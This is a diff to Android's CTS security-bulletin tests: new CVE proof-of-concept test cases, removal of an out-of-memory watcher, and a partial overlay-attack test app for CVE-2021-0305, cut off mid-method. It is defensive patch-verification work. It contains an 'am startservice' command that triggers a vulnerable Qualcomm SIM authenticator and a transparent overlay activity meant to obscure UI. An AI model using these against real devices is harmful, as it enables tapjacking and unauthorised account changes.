+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0439 extends SecurityTestCase {
+
+ /**
+ * b/174243830
+ * Vulnerability Behaviour: SIGSEGV in system_server
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0439() throws Exception {
+ String processPatternStrings[] = {"system_server"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
deleted file mode 100644
index d97c4db..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
+++ /dev/null
@@ -1,228 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import com.android.tradefed.device.CollectingOutputReceiver;
-import com.android.tradefed.device.DeviceNotAvailableException;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
-import com.android.tradefed.device.BackgroundDeviceAction;
-
-import android.platform.test.annotations.RootPermissionTest;
-
-import java.io.BufferedOutputStream;
-import java.io.File;
-import java.io.FileOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.util.Scanner;
-import java.util.regex.Pattern;
-import java.util.regex.Matcher;
-import java.util.Map;
-import java.util.HashMap;
-import java.util.concurrent.ConcurrentHashMap;
-import com.android.ddmlib.MultiLineReceiver;
-import com.android.ddmlib.Log;
-import com.android.ddmlib.TimeoutException;
-import java.lang.ref.WeakReference;
-
-/**
- * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
- * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
- * instance per instance of SecurityTestCase and call start() and stop() matching to
- * SecurityTestCase setup() and teardown().
- */
-public class HostsideOomCatcher {
-
- private static final String LOG_TAG = "HostsideOomCatcher";
-
- private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = (long)(1.5 * 1024 * 1024); //1.5GB
- private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
- new ConcurrentHashMap<>();
- private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
-
- private boolean isLowMemoryDevice = false;
-
- private SecurityTestCase context;
-
- /**
- * test behavior when oom is detected.
- */
- public enum OomBehavior {
- FAIL_AND_LOG, // normal behavior
- PASS_AND_LOG, // skip tests that oom low memory devices
- FAIL_NO_LOG, // tests that check for oom
- }
- private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
- private boolean oomDetected = false; // accessed across threads
-
- public HostsideOomCatcher(SecurityTestCase context) {
- this.context = context;
- }
-
- /**
- * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
- */
- private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
- // cache device TotalMem to avoid an adb shell for every test.
- String serial = device.getSerialNumber();
- Long totalMemory = totalMemories.get(serial);
- if (totalMemory == null) {
- String memInfo = device.executeShellCommand("cat /proc/meminfo");
- Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
- Matcher matcher = pattern.matcher(memInfo);
- if (matcher.find()) {
- totalMemory = Long.parseLong(matcher.group(1));
- } else {
- throw new RuntimeException("Could not get device memory total.");
- }
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "Device " + serial + " has " + totalMemory + "KB total memory.");
- totalMemories.put(serial, totalMemory);
- }
- return totalMemory;
- }
-
- /**
- * Start the hostside oom catcher thread for the test.
- * Match this call to SecurityTestCase.setup().
- */
- public synchronized void start() throws Exception {
- long totalMemory = getMemTotal(getDevice());
- isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
-
- // reset test oom behavior
- // Devices should fail tests that OOM so that they'll be ran again with --retry.
- // If the test OOMs because previous tests used the memory, it will likely pass
- // on a second try.
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- oomDetected = false;
-
- // Cache OOM detection in separate persistent threads for each device.
- WeakReference<BackgroundDeviceAction> reference =
- oomCatchers.get(getDevice().getSerialNumber());
- BackgroundDeviceAction oomCatcher = null;
- if (reference != null) {
- oomCatcher = reference.get();
- }
- if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
- AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
-
- oomCatcher = new BackgroundDeviceAction(
- "logcat -c && logcat OomCatcher:V *:S",
- "Oom Catcher background thread",
- getDevice(), new OomReceiver(getDevice()), 0);
-
- oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
- oomCatcher.start();
- }
- }
-
- /**
- * Stop the hostside oom catcher thread.
- * Match this call to SecurityTestCase.setup().
- */
- public static void stop(String serial) {
- WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
- if (reference != null) {
- BackgroundDeviceAction oomCatcher = reference.get();
- if (oomCatcher != null) {
- oomCatcher.cancel();
- }
- }
- }
-
- /**
- * Check every test teardown to see if the device oomed during the test.
- */
- public synchronized boolean isOomDetected() {
- return oomDetected;
- }
-
- /**
- * Return the current test behavior for when oom is detected.
- */
- public synchronized OomBehavior getOomBehavior() {
- return oomBehavior;
- }
-
- /**
- * Flag meaning the test will likely fail on devices with low memory.
- */
- public synchronized void setHighMemoryTest() {
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- }
-
- /**
- * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
- * intentionally OOMs the device.
- */
- public synchronized void setOomTest() {
- oomBehavior = OomBehavior.FAIL_NO_LOG;
- }
-
- private ITestDevice getDevice() {
- return context.getDevice();
- }
-
- /**
- * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
- * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
- */
- class OomReceiver extends MultiLineReceiver {
-
- private ITestDevice device = null;
- private boolean isCancelled = false;
-
- public OomReceiver(ITestDevice device) {
- this.device = device;
- }
-
- @Override
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*Low memory.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "lowmemorykiller detected; rebooting device.");
- synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
- oomDetected = true; // set HostSideOomCatcher var
- }
- try {
- device.nonBlockingReboot();
- device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- @Override
- public boolean isCancelled() {
- return isCancelled;
- }
- }
-}
-
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 39b7ada..0895607 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -44,7 +44,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2015_1805() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 4367a61..835c1cf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -58,7 +58,6 @@
@Test
@SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3747() throws Exception {
- getOomCatcher().setHighMemoryTest();
AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver");
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index 44b0d89..dc41d7c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13286() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13288() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice());
}
@@ -55,7 +53,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
public void testPocCVE_2017_13289() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
index 6b51f0a..e3128f1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -33,7 +33,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13315() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
}
@@ -44,7 +43,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-05")
public void testPocCVE_2017_13312() throws Exception {
- getOomCatcher().setHighMemoryTest();
LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 172f0fc..64929d9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -35,4 +35,26 @@
AdbUtils.runPocAssertNoCrashes(
"CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service");
}
+
+ /*
+ * CVE-2017-18275
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testPocCVE_2017_18275() throws Exception {
+ String command =
+ "am startservice "
+ + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService "
+ + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275";
+ String result = AdbUtils.runCommandLine(
+ "pm list packages | grep com.qualcomm.simcontacts", getDevice());
+ if (result.contains("com.qualcomm.simcontacts")) {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runCommandLine(command, getDevice());
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine(
+ "Authenticator: Add SIM account.*ContactsProvider: Accounts changed",
+ logcat);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
new file mode 100644
index 0000000..9c60f67
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Poc19_04 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-13895
+ */
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testPocCVE_2018_13895() throws Exception {
+ String result = AdbUtils.runCommandLine(
+ "pm list package com.suntek.mway.rcs.app.service",getDevice());
+ assertFalse(result.contains("com.suntek.mway.rcs.app.service"));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
index fe8c239..07f45db 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java
@@ -133,8 +133,8 @@
}
testFile += bitness;
}
- File localFile = buildHelper.getTestFile(testFile);
CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile);
+ File localFile = buildHelper.getTestFile(testFile);
device.pushFile(localFile, remoteFile);
if (cleanup) {
filesToCleanup.add(remoteFile);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 2b83077..5dc4590 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -58,7 +58,6 @@
private long kernelStartTime;
- private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this);
@Rule public TestName testName = new TestName();
@@ -80,7 +79,6 @@
// TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- oomCatcher.start();
sBuildInfo.put(getDevice(), getBuild());
sAbi.put(getDevice(), getAbi());
sTestName.put(getDevice(), testName.getMethodName());
@@ -95,8 +93,6 @@
*/
@After
public void tearDown() throws Exception {
- oomCatcher.stop(getDevice().getSerialNumber());
-
try {
getDevice().waitForDeviceAvailable(90 * 1000);
} catch (DeviceNotAvailableException e) {
@@ -105,27 +101,11 @@
getDevice().waitForDeviceAvailable(30 * 1000);
}
- if (oomCatcher.isOomDetected()) {
- // we don't need to check kernel start time if we intentionally rebooted because oom
- updateKernelStartTime();
- switch (oomCatcher.getOomBehavior()) {
- case FAIL_AND_LOG:
- fail("The device ran out of memory.");
- break;
- case PASS_AND_LOG:
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
- break;
- case FAIL_NO_LOG:
- fail();
- break;
- }
- } else {
- long deviceTime = getDeviceUptime() + kernelStartTime;
- long hostTime = System.currentTimeMillis() / 1000;
- assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
+ long deviceTime = getDeviceUptime() + kernelStartTime;
+ long hostTime = System.currentTimeMillis() / 1000;
+ assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
- // TODO(badash@): add ability to catch runtime restart
- }
+ // TODO(badash@): add ability to catch runtime restart
}
public static IBuildInfo getBuildInfo(ITestDevice device) {
@@ -231,7 +211,22 @@
* Check if a driver is present on a machine.
*/
protected boolean containsDriver(ITestDevice device, String driver) throws Exception {
- boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ boolean containsDriver = false;
+ if (driver.contains("*")) {
+ // -A list all files but . and ..
+ // -d directory, not contents
+ // -1 list one file per line
+ // -f unsorted
+ String ls = "ls -A -d -1 -f " + driver;
+ if (AdbUtils.runCommandGetExitCode(ls, device) == 0) {
+ String[] expanded = device.executeShellCommand(ls).split("\\R");
+ for (String expandedDriver : expanded) {
+ containsDriver |= containsDriver(device, expandedDriver);
+ }
+ }
+ } else {
+ containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ }
MetricsReportLog reportLog = buildMetricsReportLog(getDevice());
reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE);
@@ -267,7 +262,15 @@
}
private long getDeviceUptime() throws DeviceNotAvailableException {
- String uptime = getDevice().executeShellCommand("cat /proc/uptime");
+ String uptime = null;
+ int attempts = 5;
+ do {
+ if (attempts-- <= 0) {
+ throw new RuntimeException("could not get device uptime");
+ }
+ getDevice().waitForDeviceAvailable();
+ uptime = getDevice().executeShellCommand("cat /proc/uptime").trim();
+ } while (uptime.isEmpty());
return Long.parseLong(uptime.substring(0, uptime.indexOf('.')));
}
@@ -285,10 +288,6 @@
kernelStartTime = (System.currentTimeMillis() / 1000) - uptime;
}
- public HostsideOomCatcher getOomCatcher() {
- return oomCatcher;
- }
-
/**
* Return true if a module is play managed.
*
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 80fcf24..c596244 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -46,6 +46,19 @@
******************************************************************************/
/**
+ * b/17769851
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2015-12")
+ @Test
+ public void testPocCVE_2015_6616() throws Exception {
+ pocPusher.only64();
+ String inputFiles[] = {"cve_2015_6616.mp4"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2015-6616",
+ AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+
+ /**
* b/37239013
* Vulnerability Behaviour: EXIT_VULNERABLE (113)
*/
@@ -98,6 +111,7 @@
@SecurityTest(minPatchLevel = "2020-11")
@Test
public void testPocCVE_2020_0450() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice());
}
@@ -153,6 +167,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2133() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice());
}
@@ -163,6 +178,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2134() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice());
}
@@ -515,7 +531,11 @@
String binaryName = "CVE-2018-9537";
String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
- testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ // example of check crash to skip:
+ // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.'
+ testConfig.config = new CrashUtils.Config()
+ .setProcessPatterns(binaryName)
+ .appendAbortMessageExcludes("CHECK\\(.*?\\)");
testConfig.config.setSignals(signals);
AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
new file mode 100644
index 0000000..bc457eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
@@ -0,0 +1,34 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2021-0305",
+ defaults: ["cts_support_defaults"],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
new file mode 100644
index 0000000..07131a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0305"
+ android:targetSandboxVersion="2">
+
+ <uses-permission android:name="android.permission.CAMERA" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+
+ <application>
+ <uses-library android:name="android.test.runner" />
+ <activity
+ android:name=".MainActivity"
+ android:label="ST (Permission)"
+ android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name=".OverlayActivity"
+ android:theme="@style/OverlayTheme"
+ android:exported="true"/>
+
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0305" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
new file mode 100644
index 0000000..20a9812
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ xmlns:tools="http://schemas.android.com/tools"
+ xmlns:app="http://schemas.android.com/apk/res-auto"
+ tools:context=".MainActivity">
+
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/sample_text"
+ />
+
+ <Button
+ android:id="@+id/testButton1"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/test_button_label"
+ android:layout_centerInParent="true"
+ android:gravity="end|center_vertical"
+ />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
new file mode 100644
index 0000000..815602c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
@@ -0,0 +1,28 @@
+<resources>
+
+ <attr name="colorOverlay" format="color" />
+ <attr name="colorDialog" format="color" />
+ <attr name="projectAlpha" format="float" />
+
+ <!-- Switch between the two to see what's happening behind the attacks -->
+ <style name="AppTheme" parent="SeeBehind"/>
+ <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>-->
+
+ <style name="SeeBehind">
+ <item name="colorOverlay">#BB4BEFD7</item>
+ <item name="colorDialog">#88FFFFFF</item>
+ <item name="projectAlpha">0.0</item>
+ </style>
+
+ <color name="colorM">#5600D1</color>
+
+ <style name="OverlayTheme" parent="AppTheme">
+ <!--<item name="android:windowBackground">@color/colorM</item>-->
+ <item name="android:windowBackground">@android:color/transparent</item>
+ <item name="android:windowAnimationStyle">@null</item>
+ <item name="android:windowIsTranslucent">true</item>
+ </style>
+
+
+
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
new file mode 100644
index 0000000..ab8b450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
@@ -0,0 +1,5 @@
+<resources>
+ <string name="app_name">CVE_2021_0305</string>
+ <string name="test_button_label">Test Button</string>
+ <string name="sample_text">text in activity</string>
+</resources>
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
new file mode 100644
index 0000000..5634f4f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
@@ -0,0 +1,142 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.SystemClock;
+import android.util.Log;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import androidx.test.filters.SdkSuppress;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+import androidx.test.uiautomator.BySelector;
+
+import static org.hamcrest.CoreMatchers.equalTo;
+import static org.hamcrest.CoreMatchers.is;
+import static org.hamcrest.CoreMatchers.notNullValue;
+import static org.junit.Assert.assertThat;
+import static org.junit.Assert.assertFalse;
+
+/**
+ * Basic sample for unbundled UiAutomator.
+ */
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String BASIC_SAMPLE_PACKAGE
+ = "android.security.cts.CVE_2021_0305";
+ private static final int LAUNCH_TIMEOUT_MS = 20000;
+ private static final String STRING_TO_BE_TYPED = "UiAutomator";
+
+ private UiDevice mDevice;
+
+ @Before
+ public void startMainActivityFromHomeScreen() {
+
+ Log.d("CVE", "startMainActivityFromHomeScreen()");
+
+ // Initialize UiDevice instance
+ mDevice = UiDevice.getInstance(getInstrumentation());
+
+ // Start from the home screen
+ mDevice.pressHome();
+
+ // Launch the blueprint app
+ Context context = getApplicationContext();
+ assertThat(context, notNullValue());
+ PackageManager packageManager = context.getPackageManager();
+ assertThat(packageManager, notNullValue());
+ final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE);
+ assertThat(intent, notNullValue());
+
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances
+ context.startActivity(intent);
+
+ // Wait for the app to appear
+ Log.d("CVE", "wait for the app to appear");
+ mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ Log.d("CVE", "app appeared");
+ }
+
+ @After
+ public void lastOperation(){
+ Log.d("CVE", "lastOperation() wait 20s");
+ SystemClock.sleep(20000);
+ Log.d("CVE", "lastOperation() completed");
+ }
+
+ @Test
+ public void testClick() {
+ Log.d("CVE", "testClick()");
+ boolean clicked = false;
+ java.util.List<UiObject2> objects;
+ BySelector selector = By.clickable(true);
+ String button;
+
+ //Detect "Test Button".
+ //"Test Button" appears after onResume().
+ //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ //waits for onEnterAnimationComplete() to finish.
+ //So we have LAUNCH_TIMEOUT_MS for the button to appear.
+ //If the button it still not available then
+ //we assume the button is obscured and the test passes.
+ Log.d("CVE", "looking for clickable");
+ objects = mDevice.findObjects(selector);
+ for (UiObject2 o : objects) {
+ button = o.getText();
+ Log.d("CVE", "button:" + button);
+
